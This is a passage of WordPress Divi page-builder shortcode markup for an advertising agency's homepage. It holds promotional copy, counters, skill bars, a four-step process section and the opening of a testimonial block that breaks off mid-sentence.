text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of 